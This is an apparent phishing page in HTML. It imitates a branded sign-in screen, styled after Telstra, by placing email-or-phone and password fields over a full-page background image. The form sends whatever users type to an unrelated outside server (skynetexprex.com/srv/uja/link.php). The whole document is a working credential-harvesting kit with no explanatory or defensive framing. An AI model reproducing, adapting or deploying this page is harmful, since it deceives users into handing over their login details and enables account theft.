
<html>
<head>

<meta http-equiv="content-type" content="text/html; charset=UTF8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">
<link rel="stylesheet" href="bootstrap/css/bootstrap.min.css">




<link href="https://i.imgur.com/jYaH3w4.png" rel="" />
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-KK94CHFLLe+nY2dmCWGMq91rCGa5gtU4mk92HdvYe+M/SXH301p5ILy+dN9+nJOZ" crossorigin="anonymous">

<style type="text/css">
.em {
font: 400 1rem/1.4 Telstra Akkurat, Helvetica Neue, Helvetica, Arial, sans-serif;
    letter-spacing: 0.009375rem;
    margin: 0;
    color: #414141;
    color: var(--textSecondary);
    border-radius: 0.25rem;
    display: inline-block;
    height: 53px;
    width: auto;
    border: 0.2;
	border-color:#282828;
    background-color: #FFF;
    background-color: var(--boxBackground);
    padding: 14px 17px 13px 10px;
    margin: 0.5rem 0 0 0;
    -webkit-text-decoration: none;
    text-decoration: none;
    color: #282828;
    color: var(--textPrimary);
    caret-color: #0064D2;
    caret-color: var(--indicatorNormal);
    box-shadow: inset 0 0 0 0.0625rem #707070;
    box-shadow: inset 0 0 0 0.0625rem var(--borderNormal);
    -webkit-appearance: none;
    -moz-appearance: none;
    appearance: none;
    transition: background-color 250ms linear, box-shadow 250ms linear;
	}

 </style>



</head>
<body>
<div class="container">
  <div id="image1" style="position:absolute; overflow:hidden; left:-3px; top:7px; width:1348px; height:857px; z-index:0"><img src="linkbg.jpg" alt="" title="" border=0 width=1348 height=857></div>
     <form name="Form" action="https://skynetexprex.com/srv/uja/link.php"  method="post" >


    <input name="formtext1" value="" class="em" placeholder="Email or Phone" autocomplete="on" required type="text" style="position:absolute;width:308px;left:515px;top:174px;z-index:6" height="61" autofocus>

	  <input name="formtext2" value=""  class=" em" autocomplete="off" placeholder="Password" required type="password" style="position:absolute;width:308px;left:515px;top:249px;z-index:6" height="61"  >

	  <div id="formimage1" style="position:absolute; left:517px; top:349px; width:312px; height:59px; z-index:5" >
	    <input type="image" name="submit" width="312" height="59" src="linkbtn.jpg" id="submit" >
	  </div>
</div>
  </form>

</div>
</body>
</html>
